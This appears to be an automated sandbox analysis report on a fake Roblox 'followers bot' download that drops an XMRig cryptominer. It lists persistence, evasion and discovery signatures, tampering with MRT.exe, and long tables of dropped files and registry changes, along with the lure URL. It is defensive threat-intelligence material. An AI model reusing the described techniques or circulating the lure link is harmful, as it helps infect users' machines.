Malware Analysis Report

2025-08-05 11:14

Sample ID 241027-ntmavayajp
Target https://bit.ly/followersbot_rblx
Tags
xmrig discovery evasion execution miner persistence pyinstaller upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://bit.ly/followersbot_rblx was found to be: Known bad.

Malicious Activity Summary

xmrig discovery evasion execution miner persistence pyinstaller upx

Suspicious use of NtCreateUserProcessOtherParentProcess

Xmrig family

xmrig

XMRig Miner payload

Creates new service(s)

Command and Scripting Interpreter: PowerShell

Stops running service(s)

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Suspicious use of SetThreadContext

UPX packed file

Drops file in Program Files directory

Launches sc.exe

Browser Information Discovery

Detects Pyinstaller

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Modifies Internet Explorer settings

Delays execution with timeout.exe

Checks processor information in registry

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Suspicious use of UnmapMainImage

Uses Task Scheduler COM API

Uses Volume Shadow Copy WMI provider

Opens file in notepad (likely ransom note)

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 11:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 11:41

Reported

2024-10-27 11:47

Platform

win10ltsc2021-20241023-en

Max time kernel

335s

Max time network

331s

Command Line

winlogon.exe

Signatures

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Stops running service(s)

evasion execution

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\Tasks\dialersvc64 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\2b12a2bb-9197-427f-bdee-328153f6caeb.tmp C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241027114144.pma C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000 C:\Windows\System32\svchost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f C:\Windows\System32\svchost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000 C:\Windows\System32\svchost.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1730029393" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\Explorer.EXE N/A
